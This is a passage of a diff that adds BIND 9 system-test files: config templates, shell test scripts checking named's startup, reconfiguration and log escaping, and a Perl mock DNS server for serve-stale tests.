address 10.53.0.2; + port @PORT@; + pid-file "named-alt3.pid"; + lock-file none; + listen-on { 10.53.0.2; 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + notify yes; + dnssec-validation no; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt4.conf.in b/bin/tests/system/runtime/ns2/named-alt4.conf.in new file mode 100644 index 0000000..aa3a010 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt4.conf.in @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "./nope"; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt5.conf.in b/bin/tests/system/runtime/ns2/named-alt5.conf.in new file mode 100644 index 0000000..23d09b5 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt5.conf.in @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + managed-keys-directory "./nope"; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt6.conf.in b/bin/tests/system/runtime/ns2/named-alt6.conf.in new file mode 100644 index 0000000..3ebc140 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt6.conf.in @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + new-zones-directory "./nope"; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt7.conf.in b/bin/tests/system/runtime/ns2/named-alt7.conf.in new file mode 100644 index 0000000..49f38b4 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt7.conf.in @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt9.conf.in b/bin/tests/system/runtime/ns2/named-alt9.conf.in new file mode 100644 index 0000000..6ae88e5 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt9.conf.in @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named9.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; diff --git a/bin/tests/system/runtime/ns2/named1.conf.in b/bin/tests/system/runtime/ns2/named1.conf.in new file mode 100644 index 0000000..b389863 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named1.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + notify yes; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/runtime/setup.sh b/bin/tests/system/runtime/setup.sh new file mode 100644 index 0000000..8ab72a3 --- /dev/null +++ b/bin/tests/system/runtime/setup.sh @@ -0,0 +1,36 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns2/named1.conf.in ns2/named.conf + +copy_setports ns2/named-alt1.conf.in ns2/named-alt1.conf +copy_setports ns2/named-alt2.conf.in ns2/named-alt2.conf +copy_setports ns2/named-alt3.conf.in ns2/named-alt3.conf +copy_setports ns2/named-alt4.conf.in ns2/named-alt4.conf +copy_setports ns2/named-alt5.conf.in ns2/named-alt5.conf +copy_setports ns2/named-alt6.conf.in ns2/named-alt6.conf +copy_setports ns2/named-alt7.conf.in ns2/named-alt7.conf + +mkdir ns2/nope + +if [ 1 = "${CYGWIN:-0}" ] +then + setfacl -s user::r-x,group::r-x,other::r-x ns2/nope +else + chmod 555 ns2/nope +fi diff --git a/bin/tests/system/runtime/tests.sh b/bin/tests/system/runtime/tests.sh new file mode 100644 index 0000000..d5e4277 --- /dev/null +++ b/bin/tests/system/runtime/tests.sh @@ -0,0 +1,254 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" +NAMED_DEFAULT_ARGS="-m record,size,mctx -d 99 -g -U 4" + +kill_named() { + pidfile="${1}" + if [ ! -r "${pidfile}" ]; then + return 1 + fi + + pid=$(cat "${pidfile}" 2>/dev/null) + if [ "${pid:+set}" = "set" ]; then + $KILL -15 "${pid}" >/dev/null 2>&1 + retries=10 + while [ "$retries" -gt 0 ]; do + if ! $KILL -0 "${pid}" >/dev/null 2>&1; then + break + fi + sleep 1 + retries=$((retries-1)) + done + # Timed-out + if [ "$retries" -eq 0 ]; then + echo_i "failed to kill named ($pidfile)" + return 1 + fi + fi + rm -f "${pidfile}" + return 0 +} + +check_named_log() { + grep "$@" >/dev/null 2>&1 +} + +run_named() ( + dir="$1" + shift + run="$1" + shift + if cd "$dir" > /dev/null 2>&1 + then + "${NAMED}" "$@" ${NAMED_DEFAULT_ARGS} >> "$run" 2>&1 & + echo $! + fi +) + +check_pid() ( + return $(! $KILL -0 "${1}" >/dev/null 2>&1) +) + +status=0 +n=0 + +n=$((n+1)) +echo_i "verifying that named started normally ($n)" +ret=0 +[ -s ns2/named.pid ] || ret=1 +grep "unable to listen on any configured interface" ns2/named.run > /dev/null && ret=1 +grep "another named process" ns2/named.run > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verifying that named checks for conflicting named processes ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt2.conf -D runtime-ns2-extra-2 -X named.lock) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "another named process" ns2/named$n.run || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +test -n "$testpid" && $KILL -15 $testpid > kill$n.out 2>&1 && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verifying that 'lock-file none' disables process check ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt3.conf -D runtime-ns2-extra-3) +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep "another named process" ns2/named$n.run > /dev/null && ret=1 +kill_named ns2/named-alt3.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to reconfigure if working directory is not writable ($n)" +ret=0 +copy_setports ns2/named-alt4.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 && ret=1 +grep "failed: permission denied" rndc.out.$n > /dev/null 2>&1 || ret=1 +sleep 1 +grep "[^-]directory './nope' is not writable" ns2/named.run > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to reconfigure if managed-keys-directory is not writable ($n)" +ret=0 +copy_setports ns2/named-alt5.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 && ret=1 +grep "failed: permission denied" rndc.out.$n > /dev/null 2>&1 || ret=1 +sleep 1 +grep "managed-keys-directory './nope' is not writable" ns2/named.run > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to reconfigure if new-zones-directory is not writable ($n)" +ret=0 +copy_setports ns2/named-alt6.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 && ret=1 +grep "failed: permission denied" rndc.out.$n > /dev/null 2>&1 || ret=1 +sleep 1 +grep "new-zones-directory './nope' is not writable" ns2/named.run > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named recovers when configuration file is valid again ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 || ret=1 +[ -s ns2/named.pid ] || ret=1 +kill_named ns2/named.pid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to start if working directory is not writable ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt4.conf -D runtime-ns2-extra-4) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "exiting (due to fatal error)" ns2/named$n.run || ret=1 +grep "[^-]directory './nope' is not writable" ns2/named$n.run > /dev/null 2>&1 || ret=1 +kill_named ns2/named.pid && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to start if managed-keys-directory is not writable ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt5.conf -D runtime-ns2-extra-5) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "exiting (due to fatal error)" ns2/named$n.run || ret=1 +grep "managed-keys-directory './nope' is not writable" ns2/named$n.run > /dev/null 2>&1 || ret=1 +kill_named named.pid && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to start if new-zones-directory is not writable ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt6.conf -D runtime-ns2-extra-6) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "exiting (due to fatal error)" ns2/named$n.run || ret=1 +grep "new-zones-directory './nope' is not writable" ns2/named$n.run > /dev/null 2>&1 || ret=1 +kill_named ns2/named.pid && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named logs control characters in octal notation ($n)" +ret=0 +INSTANCE_NAME="runtime-ns2-extra-7-$(cat ctrl-chars)" +testpid=$(run_named ns2 named$n.run -c named-alt7.conf -D "${INSTANCE_NAME}") +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep 'running as.*\\177\\033' ns2/named$n.run > /dev/null || ret=1 +kill_named ns2/named.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named escapes special characters in the logs ($n)" +ret=0 +INSTANCE_NAME="runtime-ns2-extra-8-$;" +testpid=$(run_named ns2 named$n.run -c named-alt7.conf -D "${INSTANCE_NAME}") +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep 'running as.*\\$\\;' ns2/named$n.run > /dev/null || ret=1 +kill_named ns2/named.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named logs an ellipsis when the command line is larger than 8k bytes ($n)" +ret=0 +LONG_CMD_LINE=$(cat long-cmd-line) +# shellcheck disable=SC2086 +testpid=$(run_named ns2 named$n.run $LONG_CMD_LINE -c "named-alt7.conf") +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep "running as.*\.\.\.$" ns2/named$n.run > /dev/null || ret=1 +kill_named ns2/named.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verifying that named switches UID ($n)" +if [ "$(id -u)" -eq 0 ] && [ -z "$CYGWIN" ]; then + ret=0 + TEMP_NAMED_DIR=$(mktemp -d "$(pwd)/ns2/tmp.XXXXXXXX") + if [ "$?" -eq 0 ]; then + copy_setports ns2/named-alt9.conf.in "${TEMP_NAMED_DIR}/named-alt9.conf" + export SOFTHSM2_CONF="${TEMP_NAMED_DIR}/softhsm2.conf" + sh "$TOP/bin/tests/prepare-softhsm2.sh" + chown -R nobody: "${TEMP_NAMED_DIR}" + chmod 0700 "${TEMP_NAMED_DIR}" + testpid=$(run_named "${TEMP_NAMED_DIR}" "${TEMP_NAMED_DIR}/named$n.run" -u nobody -c named-alt9.conf) + test -n "$testpid" || ret=1 + retry_quiet 60 check_named_log "running$" "${TEMP_NAMED_DIR}/named$n.run" || ret=1 + [ -s "${TEMP_NAMED_DIR}/named9.pid" ] || ret=1 + grep "loading configuration: permission denied" "${TEMP_NAMED_DIR}/named$n.run" > /dev/null && ret=1 + kill_named "${TEMP_NAMED_DIR}/named9.pid" || ret=1 + test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 + else + echo_i "mktemp failed" + ret=1 + fi + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipped, not running as root or running on Windows" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/send.pl b/bin/tests/system/send.pl new file mode 100644 index 0000000..62b4f7a --- /dev/null +++ b/bin/tests/system/send.pl @@ -0,0 +1,33 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Send a file to a given address and port using TCP. Used for +# configuring the test server in ans.pl. +# + +use IO::File; +use IO::Socket; + +@ARGV == 2 or die "usage: send.pl host port [file ...]\n"; + +my $host = shift @ARGV; +my $port = shift @ARGV; + +my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, + Proto => "tcp",) or die "$!"; +while (<>) { + $sock->syswrite($_, length $_); +} + +$sock->close; diff --git a/bin/tests/system/serve-stale/ans2/ans.pl b/bin/tests/system/serve-stale/ans2/ans.pl new file mode 100644 index 0000000..3fdc1fc --- /dev/null +++ b/bin/tests/system/serve-stale/ans2/ans.pl @@ -0,0 +1,331 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use IO::Socket; +use Getopt::Long; +use Net::DNS; +use Time::HiRes qw(usleep nanosleep); + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +# If send_response is set, the server will respond, otherwise the query will +# be dropped. +my $send_response = 1; +# If slow_response is set, a lookup for the CNAME target (target.example) is +# delayed. Other lookups will not be delayed. +my $slow_response = 0; + +my $localaddr = "10.53.0.2"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$localaddr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +# +# Delegation +# +my $SOA = "example 300 IN SOA . . 0 0 0 0 300"; +my $NS = "example 300 IN NS ns.example"; +my $A = "ns.example 300 IN A $localaddr"; + +# +# Slow delegation +# +my $slowSOA = "slow 300 IN SOA . . 0 0 0 0 300"; +my $slowNS = "slow 300 IN NS ns.slow"; +my $slowA = "ns.slow 300 IN A $localaddr"; +my $slowTXT = "data.slow 2 IN TXT \"A slow text record with a 2 second ttl\""; +my $slownegSOA = "slow 2 IN SOA . . 0 0 0 0 300"; + +# +# Records to be TTL stretched +# +my $TXT = "data.example 2 IN TXT \"A text record with a 2 second ttl\""; +my $LONGTXT = "longttl.example 600 IN TXT \"A text record with a 600 second ttl\""; +my $CAA = "othertype.example 2 IN CAA 0 issue \"ca1.example.net\""; +my $negSOA = "example 2 IN SOA . . 0 0 0 0 300"; +my $CNAME = "cname.example 7 IN CNAME target.example"; +my $TARGET = "target.example 9 IN A $localaddr"; +my $SHORTCNAME = "shortttl.cname.example 1 IN CNAME longttl.target.example"; +my $LONGTARGET = "longttl.target.example 600 IN A $localaddr"; + +sub reply_handler { + my ($qname, $qclass, $qtype) = @_; + my ($rcode, @ans, @auth, @add); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + # Control whether we send a response or not. + # We always respond to control commands. + if ($qname eq "enable" ) { + if ($qtype eq "TXT") { + $send_response = 1; + my $rr = new Net::DNS::RR("$qname 0 $qclass TXT \"$send_response\""); + push @ans, $rr; + } + $rcode = "NOERROR"; + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); + } elsif ($qname eq "disable" ) { + if ($qtype eq "TXT") { + $send_response = 0; + my $rr = new Net::DNS::RR("$qname 0 $qclass TXT \"$send_response\""); + push @ans, $rr; + } + $rcode = "NOERROR"; + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); + } elsif ($qname eq "slowdown" ) { + if ($qtype eq "TXT") { + $send_response = 1; + $slow_response = 1; + my $rr = new Net::DNS::RR("$qname 0 $qclass TXT \"$send_response\""); + push @ans, $rr; + } + $rcode = "NOERROR"; + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); + } + + # If we are not responding to queries we are done. + return if (!$send_response); + + if (index($qname, "latency") == 0) { + # simulate network latency before answering + print " Sleeping 50 milliseconds\n"; + select(undef, undef, undef, 0.05); + } + + # Construct the response and send it. + if ($qname eq "ns.example" ) { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($A); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($SOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "example") { + if ($qtype eq "NS") { + my $rr = new Net::DNS::RR($NS); + push @auth, $rr; + $rr = new Net::DNS::RR($A); + push @add, $rr; + } elsif ($qtype eq "SOA") { + my $rr = new Net::DNS::RR($SOA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($SOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "nodata.example") { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "data.example") { + if ($qtype eq "TXT") { + my $rr = new Net::DNS::RR($TXT); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "a-only.example") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR("a-only.example 2 IN A $localaddr"); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "cname.example") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($CNAME); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "target.example") { + if ($slow_response) { + print " Sleeping 3 seconds\n"; + sleep(3); + } + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($TARGET); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "shortttl.cname.example") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($SHORTCNAME); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "longttl.target.example") { + if ($slow_response) { + print " Sleeping 3 seconds\n"; + sleep(3); + } + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($LONGTARGET); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "longttl.example") { + if ($qtype eq "TXT") { + my $rr = new Net::DNS::RR($LONGTXT); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "nxdomain.example") { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + $rcode = "NXDOMAIN"; + } elsif ($qname eq "othertype.example") { + if ($qtype eq "CAA") { + my $rr = new Net::DNS::RR($CAA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "ns.slow" ) { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($slowA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($slowSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "slow") { + if ($qtype eq "NS") { + my $rr = new Net::DNS::RR($slowNS); + push @auth, $rr; + $rr = new Net::DNS::RR($slowA); + push @add, $rr; + } elsif ($qtype eq "SOA") { + my $rr = new Net::DNS::RR($slowSOA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($slowSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "data.slow") { + if ($slow_response) { + print " Sleeping 3 seconds\n"; + sleep(3); + # only one time + $slow_response = 0; + } + if ($qtype eq "TXT") { + my $rr = new Net::DNS::RR($slowTXT); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($slownegSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } else { + my $rr = new Net::DNS::RR($SOA); + push @auth, $rr; + $rcode = "NXDOMAIN"; + } + + # mark the answer as authoritative (by setting the 'aa' flag) + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); +} + +GetOptions( + 'port=i' => \$localport, +); + +my $rin; +my $rout; + +for (;;) { + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + my ($buf, $request, $err); + $udpsock->recv($buf, 512); + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qclass = $questions[0]->qclass; + my $qtype = $questions[0]->qtype; + my $id = $request->header->id; + + my ($rcode, $ans, $auth, $add, $headermask) = reply_handler($qname, $qclass, $qtype); + + if (!defined($rcode)) { + print " Silently ignoring query\n"; + next; + } + + my $reply = Net::DNS::Packet->new(); + $reply->header->qr(1); + $reply->header->aa(1) if $headermask->{'aa'}; + $reply->header->id($id); + $reply->header->rcode($rcode); + $reply->push("question", @questions); + $reply->push("answer", @$ans) if $ans; + $reply->push("authority", @$auth) if $auth; + $reply->push("additional", @$add) if $add; + + my $num_chars = $udpsock->send($reply->data); + print " Sent $num_chars bytes via UDP\n"; + } +} diff --git a/bin/tests/system/serve-stale/clean.sh b/bin/tests/system/serve-stale/clean.sh new file mode 100644 index 0000000..b4a0d50 --- /dev/null +++ b/bin/tests/system/serve-stale/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out* +rm -f ns*/named.conf +rm -f ns*/root.bk +rm -f rndc.out.test* +rm -f */named.run */named.memstats +rm -f ns*/managed-keys.bind* +rm -f ns*/named_dump* +rm -f ns*/named.stats* +rm -f ns*/named.run.prev diff --git a/bin/tests/system/serve-stale/ns1/named1.conf.in b/bin/tests/system/serve-stale/ns1/named1.conf.in new file mode 100644 index 0000000..c0dd5b8 --- /dev/null +++ b/bin/tests/system/serve-stale/ns1/named1.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + max-stale-ttl 3600; + stale-answer-ttl 4; + stale-answer-enable yes; + stale-cache-enable yes; + stale-refresh-time 30; + servfail-ttl 0; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns1/named2.conf.in b/bin/tests/system/serve-stale/ns1/named2.conf.in new file mode 100644 index 0000000..985cddb --- /dev/null +++ b/bin/tests/system/serve-stale/ns1/named2.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + max-stale-ttl 20; + stale-answer-ttl 3; + stale-answer-enable yes; + stale-cache-enable yes; + servfail-ttl 0; +}; + +zone "." { + type 